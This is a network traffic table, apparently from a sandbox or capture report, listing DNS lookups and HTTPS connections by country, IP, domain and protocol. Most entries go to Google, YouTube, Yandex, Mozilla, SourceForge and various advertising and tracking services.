| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| GB | 173.194.183.71:443 | rr2---sn-aigl6ned.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | rr2.sn-aigl6ned.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigl6nsr.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigl6ned.googlevideo.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | accounts.google.com | udp |
| GB | 74.125.105.135:443 | rr2.sn-aigl6nsr.googlevideo.com | udp |
| GB | 142.250.179.225:443 | tpc.googlesyndication.com | udp |
| GB | 173.194.183.71:443 | rr2.sn-aigl6ned.googlevideo.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | tcp |
| AU | 1.0.0.1:53 | accounts.google.com | udp |
| AU | 1.0.0.1:53 | accounts.google.com | udp |
| BE | 142.251.173.84:443 | accounts.google.com | udp |
| AU | 1.0.0.1:53 | 135.105.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 225.179.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 84.173.251.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 71.183.194.173.in-addr.arpa | udp |
| US | 74.125.3.199:443 | rr2---sn-q4fl6nsk.googlevideo.com | tcp |
| US | 74.125.3.199:443 | rr2---sn-q4fl6nsk.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | rr2.sn-q4fl6nsk.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-q4fl6nsk.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2---sn-q4fl6nsk.googlevideo.com | udp |
| US | 74.125.3.199:443 | rr2---sn-q4fl6nsk.googlevideo.com | tcp |
| US | 74.125.3.199:443 | rr2---sn-q4fl6nsk.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | 199.3.125.74.in-addr.arpa | udp |
| US | 74.125.3.199:443 | rr2---sn-q4fl6nsk.googlevideo.com | tcp |
| US | 74.125.3.199:443 | rr2---sn-q4fl6nsk.googlevideo.com | tcp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | tcp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| AU | 1.0.0.1:53 | play.google.com | udp |
| AU | 1.0.0.1:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | an.yandex.ru | udp |
| AU | 1.0.0.1:53 | an.yandex.ru | udp |
| AU | 1.0.0.1:53 | an.yandex.ru | udp |
| AU | 1.0.0.1:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| AU | 1.0.0.1:53 | rr5---sn-aigl6nek.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-aigl6nek.googlevideo.com | udp |
| GB | 173.194.183.106:443 | rr5.sn-aigl6nek.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-aigl6nek.googlevideo.com | udp |
| GB | 173.194.183.106:443 | rr5.sn-aigl6nek.googlevideo.com | tcp |
| GB | 173.194.183.106:443 | rr5.sn-aigl6nek.googlevideo.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 172.217.169.65:443 | yt3.ggpht.com | tcp |
| GB | 172.217.169.65:443 | yt3.ggpht.com | udp |
| RU | 213.180.204.36:443 | favicon.yandex.net | tcp |
| RU | 213.180.204.36:443 | favicon.yandex.net | tcp |
| AU | 1.0.0.1:53 | yastatic.net | udp |
| AU | 1.0.0.1:53 | avatars.mds.yandex.net | udp |
| AU | 1.0.0.1:53 | favicon.yandex.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| AU | 1.0.0.1:53 | yastatic.net | udp |
| RU | 93.158.134.36:443 | favicon.yandex.net | tcp |
| AU | 1.0.0.1:53 | favicon.yandex.net | udp |
| RU | 87.250.247.183:443 | avatars.mds.yandex.net | tcp |
| AU | 1.0.0.1:53 | avatars.mds.yandex.net | udp |
| AU | 1.0.0.1:53 | favicon.yandex.net | udp |
| AU | 1.0.0.1:53 | avatars.mds.yandex.net | udp |
| AU | 1.0.0.1:53 | 36.134.158.93.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| AU | 1.0.0.1:53 | mc.yandex.ru | udp |
| AU | 1.0.0.1:53 | mc.yandex.ru | udp |
| AU | 1.0.0.1:53 | video-preview.s3.yandex.net | udp |
| RU | 93.158.134.158:443 | video-preview.s3.yandex.net | tcp |
| AU | 1.0.0.1:53 | s3.yandex.net | udp |
| RU | 93.158.134.158:443 | s3.yandex.net | tcp |
| AU | 1.0.0.1:53 | s3.yandex.net | udp |
| AU | 1.0.0.1:53 | 158.134.158.93.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| AU | 1.0.0.1:53 | youtube.com | udp |
| AU | 1.0.0.1:53 | youtube.com | udp |
| AU | 1.0.0.1:53 | youtube.com | udp |
| AU | 1.0.0.1:53 | ya.ru | udp |
| RU | 5.255.255.242:443 | ya.ru | tcp |
| AU | 1.0.0.1:53 | ya.ru | udp |
| AU | 1.0.0.1:53 | ya.ru | udp |
| RU | 5.255.255.242:443 | ya.ru | tcp |
| AU | 1.0.0.1:53 | yandex.ru | udp |
| AU | 1.0.0.1:53 | yandex.ru | udp |
| AU | 1.0.0.1:53 | yandex.ru | udp |
| AU | 1.0.0.1:53 | 242.255.255.5.in-addr.arpa | udp |
| RU | 87.250.247.183:443 | avatars.mds.yandex.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| AU | 1.0.0.1:53 | static-mon.yandex.net | udp |
| RU | 87.250.251.92:443 | static-mon.yandex.net | tcp |
| AU | 1.0.0.1:53 | cryprox.yandex.net | udp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| AU | 1.0.0.1:53 | cryprox.yandex.net | udp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| AU | 1.0.0.1:53 | 119.250.250.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 77.255.255.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | firefox.settings.services.mozilla.com | udp |
| RU | 87.250.251.92:443 | cryprox.yandex.net | tcp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| RU | 87.250.251.92:443 | cryprox.yandex.net | tcp |
| US | 172.67.203.125:443 | getsolara.dev | tcp |
| US | 1.1.1.1:53 | getsolara.dev | udp |
| US | 1.1.1.1:53 | getsolara.dev | udp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 172.67.203.125:443 | getsolara.dev | udp |
| US | 172.67.203.125:443 | getsolara.dev | udp |
| AU | 1.0.0.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.200.14:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| AU | 1.0.0.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| AU | 1.0.0.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | tcp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| US | 1.1.1.1:53 | sourceforge.net | udp |
| US | 104.18.37.111:443 | sourceforge.net | udp |
| AU | 1.0.0.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| US | 151.101.129.91:443 | addons.mozilla.org | tcp |
| AU | 1.0.0.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| AU | 1.0.0.1:53 | addons.mozilla.org | udp |
| US | 1.1.1.1:53 | addons.mozilla.org | udp |
| AU | 1.0.0.1:53 | browser.yandex.ru | udp |
| US | 1.1.1.1:53 | browser.yandex.ru | udp |
| RU | 93.158.134.121:443 | browser.yandex.ru | tcp |
| AU | 1.0.0.1:53 | browser.yandex.ru | udp |
| US | 1.1.1.1:53 | browser.yandex.ru | udp |
| RU | 93.158.134.121:443 | browser.yandex.ru | tcp |
| US | 1.1.1.1:53 | browser.yandex.ru | udp |
| AU | 1.0.0.1:53 | browser.yandex.ru | udp |
| US | 1.1.1.1:53 | 91.129.101.151.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 121.134.158.93.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 91.129.101.151.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 121.134.158.93.in-addr.arpa | udp |
| US | 1.1.1.1:53 | download.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | download.cdn.yandex.net | udp |
| RU | 5.45.205.241:443 | download.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cdn.yandex.net | udp |
| US | 1.1.1.1:53 | cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cdn.yandex.net | udp |
| US | 1.1.1.1:53 | cachev2-rad-05.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-rad-05.cdn.yandex.net | udp |
| US | 1.1.1.1:53 | cachev2-rad-05.cdn.yandex.net | udp |
| FI | 5.45.192.12:443 | cachev2-rad-05.cdn.yandex.net | tcp |
| AU | 1.0.0.1:53 | cachev2-rad-05.cdn.yandex.net | udp |
| US | 1.1.1.1:53 | cachev2-rad-05.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-rad-05.cdn.yandex.net | udp |
| US | 1.1.1.1:53 | 241.205.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 12.192.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 241.205.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 12.192.45.5.in-addr.arpa | udp |
| RU | 5.255.255.242:443 | ya.ru | tcp |
| US | 1.1.1.1:53 | adfstat.yandex.ru | udp |
| AU | 1.0.0.1:53 | adfstat.yandex.ru | udp |
| RU | 87.250.250.145:443 | adfstat.yandex.ru | tcp |
| US | 1.1.1.1:53 | adfstat.yandex.ru | udp |
| AU | 1.0.0.1:53 | adfstat.yandex.ru | udp |
| US | 1.1.1.1:53 | b.clarity.ms | udp |
| US | 1.1.1.1:53 | captcha-backgrounds.s3.yandex.net | udp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| RU | 178.154.131.215:443 | yastatic.net | tcp |
| AU | 1.0.0.1:53 | b.clarity.ms | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 4.153.129.168:443 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | tcp |
| AU | 1.0.0.1:53 | captcha-backgrounds.s3.yandex.net | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| RU | 93.158.134.158:443 | captcha-backgrounds.s3.yandex.net | tcp |
| US | 1.1.1.1:53 | 145.250.250.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 145.250.250.87.in-addr.arpa | udp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| AU | 1.0.0.1:53 | mc.yandex.com | udp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 1.1.1.1:53 | api.browser.yandex.net | udp |
| US | 1.1.1.1:53 | api.browser.yandex.ru | udp |
| RU | 5.45.205.241:443 | cdn.yandex.net | tcp |
| AU | 1.0.0.1:53 | api.browser.yandex.net | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | 234.193.180.213.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 133.66.101.151.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 133.194.101.151.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 133.194.101.151.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 133.66.101.151.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 234.193.180.213.in-addr.arpa | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | cachev2-kiv-05.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-kiv-05.cdn.yandex.net | udp |
| FI | 5.45.192.144:443 | cachev2-kiv-05.cdn.yandex.net | tcp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | 144.192.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 144.192.45.5.in-addr.arpa | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | cachev2-ams18.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-ams18.cdn.yandex.net | udp |
| NL | 5.45.247.18:443 | cachev2-ams18.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | 18.247.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 18.247.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cachev2-kiv-04.cdn.yandex.net | udp |
| FI | 5.45.192.142:443 | cachev2-kiv-04.cdn.yandex.net | tcp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | udp |
| US | 1.1.1.1:53 | 142.192.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 142.192.45.5.in-addr.arpa | udp |
| US | 104.18.37.111:443 | sourceforge.net | udp |
| US | 1.1.1.1:53 | a.fsdn.com | udp |
| AU | 1.0.0.1:53 | a.fsdn.com | udp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 104.18.40.209:443 | a.fsdn.com | tcp |
| US | 1.1.1.1:53 | a.fsdn.com.cdn.cloudflare.net | udp |
| AU | 1.0.0.1:53 | a.fsdn.com.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | a.fsdn.com.cdn.cloudflare.net | udp |
| AU | 1.0.0.1:53 | a.fsdn.com.cdn.cloudflare.net | udp |
| US | 104.18.40.209:443 | a.fsdn.com.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | 209.40.18.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 209.40.18.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | d.delivery.consentmanager.net | udp |
| US | 1.1.1.1:53 | cdn.consentmanager.net | udp |
| AU | 1.0.0.1:53 | cdn.consentmanager.net | udp |
| AU | 1.0.0.1:53 | d.delivery.consentmanager.net | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| GB | 89.187.167.38:443 | cdn.consentmanager.net | tcp |
| US | 1.1.1.1:53 | d.delivery.consentmanager.net | udp |
| US | 1.1.1.1:53 | 1376624012.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | c.sf-syn.com | udp |
| US | 1.1.1.1:53 | d.delivery.consentmanager.net | udp |
| US | 1.1.1.1:53 | 1376624012.rsc.cdn77.org | udp |
| AU | 1.0.0.1:53 | c.sf-syn.com | udp |
| US | 1.1.1.1:53 | c.sf-syn.com | udp |
| US | 104.18.33.97:443 | c.sf-syn.com | tcp |
| AU | 1.0.0.1:53 | c.sf-syn.com | udp |
| US | 1.1.1.1:53 | c.sf-syn.com | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 104.18.33.97:443 | c.sf-syn.com | udp |
| US | 1.1.1.1:53 | cachev2-ams17.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-ams17.cdn.yandex.net | udp |
| NL | 5.45.247.13:443 | cachev2-ams17.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | 76.98.230.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 38.167.187.89.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 97.33.18.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 97.33.18.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 38.167.187.89.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 76.98.230.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 13.247.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 13.247.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cachev2-fra-01.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-fra-01.cdn.yandex.net | udp |
| DE | 5.45.200.104:443 | cachev2-fra-01.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | btloader.com | udp |
| US | 1.1.1.1:53 | securepubads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | analytics.slashdotmedia.com | udp |
| US | 1.1.1.1:53 | j.6sc.co | udp |
| US | 1.1.1.1:53 | ml314.com | udp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | btloader.com | udp |
| US | 1.1.1.1:53 | btloader.com | udp |
| AU | 1.0.0.1:53 | analytics.slashdotmedia.com | udp |
| AU | 1.0.0.1:53 | j.6sc.co | udp |
| AU | 1.0.0.1:53 | ml314.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 1.1.1.1:53 | analytics.slashdotmedia.com | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | ml314.com | udp |
| AU | 1.0.0.1:53 | btloader.com | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | btloader.com | udp |
| US | 1.1.1.1:53 | analytics.slashdotmedia.com | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | ml314.com | udp |
| AU | 1.0.0.1:53 | btloader.com | udp |
| AU | 1.0.0.1:53 | analytics.slashdotmedia.com | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | ml314.com | udp |
| US | 104.22.75.216:443 | btloader.com | tcp |
| GB | 2.18.63.46:443 | e212585.b.akamaiedge.net | tcp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 1.1.1.1:53 | 104.200.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 9.38.105.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 216.75.22.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 46.63.18.2.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 79.77.117.34.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 46.63.18.2.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 216.75.22.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 9.38.105.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 104.200.45.5.in-addr.arpa | udp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 1.1.1.1:53 | ad-delivery.net | udp |
| GB | 142.250.187.194:443 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | ad-delivery.net | udp |
| AU | 1.0.0.1:53 | ad.doubleclick.net | udp |
| US | 1.1.1.1:53 | ad-delivery.net | udp |
| AU | 1.0.0.1:53 | ad-delivery.net | udp |
| AU | 1.0.0.1:53 | ad.doubleclick.net | udp |
| US | 1.1.1.1:53 | ad-delivery.net | udp |
| AU | 1.0.0.1:53 | ad.doubleclick.net | udp |
| AU | 1.0.0.1:53 | ad-delivery.net | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 1.1.1.1:53 | b.6sc.co | udp |
| US | 1.1.1.1:53 | c.6sc.co | udp |
| US | 1.1.1.1:53 | ipv6.6sc.co | udp |
| US | 1.1.1.1:53 | dpm.demdex.net | udp |
| US | 1.1.1.1:53 | idsync.rlcdn.com | udp |
| US | 1.1.1.1:53 | match.adsrvr.org | udp |
| US | 1.1.1.1:53 | ib.adnxs.com | udp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| AU | 1.0.0.1:53 | b.6sc.co | udp |
| AU | 1.0.0.1:53 | c.6sc.co | udp |
| AU | 1.0.0.1:53 | ipv6.6sc.co | udp |
| AU | 1.0.0.1:53 | dpm.demdex.net | udp |
| AU | 1.0.0.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | match.adsrvr.org | udp |
| AU | 1.0.0.1:53 | ps.eyeota.net | udp |
| AU | 1.0.0.1:53 | ib.adnxs.com | udp |
| US | 1.1.1.1:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| GB | 2.18.63.46:443 | ipv6.6sc.co | tcp |
| US | 1.1.1.1:53 | e212585.dscb.akamaiedge.net | udp |
| GB | 2.18.63.60:443 | ipv6.6sc.co | tcp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| AU | 1.0.0.1:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| AU | 1.0.0.1:53 | e212585.dscb.akamaiedge.net | udp |
| US | 1.1.1.1:53 | match.adsrvr.org | udp |
| US | 1.1.1.1:53 | idsync.rlcdn.com | udp |
| US | 1.1.1.1:53 | ib.anycast.adnxs.com | udp |
| AU | 1.0.0.1:53 | ps.eyeota.net | udp |
| AU | 1.0.0.1:53 | match.adsrvr.org | udp |
| AU | 1.0.0.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | ib.anycast.adnxs.com | udp |
| US | 1.1.1.1:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| US | 1.1.1.1:53 | e212585.dscb.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| AU | 1.0.0.1:53 | e212585.dscb.akamaiedge.net | udp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| US | 1.1.1.1:53 | ib.anycast.adnxs.com | udp |
| US | 1.1.1.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | ps.eyeota.net | udp |
| US | 1.1.1.1:53 | match.adsrvr.org | udp |
| AU | 1.0.0.1:53 | ib.anycast.adnxs.com | udp |
| AU | 1.0.0.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | match.adsrvr.org | udp |
| US | 1.1.1.1:53 | df5f99b3303db4a9de44d9835a1030e5.safeframe.googlesyndication.com | udp |
| US | 1.1.1.1:53 | cachev2-rad-01.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | df5f99b3303db4a9de44d9835a1030e5.safeframe.googlesyndication.com | udp |
| US | 1.1.1.1:53 | api.btloader.com | udp |
| GB | 142.250.179.225:443 | df5f99b3303db4a9de44d9835a1030e5.safeframe.googlesyndication.com | tcp |
| US | 1.1.1.1:53 | pagead-googlehosted.l.google.com | udp |
| US | 1.1.1.1:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 6.178.250.142.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 60.63.18.2.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | cachev2-rad-01.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | api.btloader.com | udp |
| AU | 1.0.0.1:53 | pagead-googlehosted.l.google.com | udp |
| AU | 1.0.0.1:53 | 70.2.26.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 60.63.18.2.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 6.178.250.142.in-addr.arpa | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 1.1.1.1:53 | api.btloader.com | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| FI | 5.45.192.4:443 | cachev2-rad-01.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | pagead-googlehosted.l.google.com | udp |
| AU | 1.0.0.1:53 | api.btloader.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| US | 1.1.1.1:53 | api.btloader.com | udp |
| US | 1.1.1.1:53 | tpc.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | pagead-googlehosted.l.google.com | udp |
| GB | 2.18.63.60:443 | ipv6.6sc.co | tcp |
| GB | 2.18.63.60:443 | ipv6.6sc.co | tcp |
| IE | 18.203.166.1:443 | dpm.demdex.net | tcp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| US | 35.71.131.137:443 | match.adsrvr.org | tcp |
| NL | 185.89.210.212:443 | ib.anycast.adnxs.com | tcp |
| DE | 3.124.210.90:443 | ps.eyeota.net | tcp |
| GB | 142.250.187.193:443 | tpc.googlesyndication.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| AU | 1.0.0.1:53 | api.btloader.com | udp |
| AU | 1.0.0.1:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.179.225:443 | df5f99b3303db4a9de44d9835a1030e5.safeframe.googlesyndication.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | udp |
| GB | 142.250.187.193:443 | tpc.googlesyndication.com | udp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| US | 1.1.1.1:53 | 194.23.211.130.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 4.192.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 212.210.89.185.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 137.131.71.35.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 90.210.124.3.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 1.166.203.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 34.200.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 4.192.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 194.23.211.130.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 137.131.71.35.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 193.187.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 212.210.89.185.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 68.174.244.35.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 34.200.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 1.166.203.18.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 90.210.124.3.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cdn.ampproject.org | udp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| AU | 1.0.0.1:53 | cdn.ampproject.org | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| US | 1.1.1.1:53 | cdn-content.ampproject.org | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| AU | 1.0.0.1:53 | cdn-content.ampproject.org | udp |
| US | 1.1.1.1:53 | cdn-content.ampproject.org | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | udp |
| US | 1.1.1.1:53 | consent.youtube.com | udp |
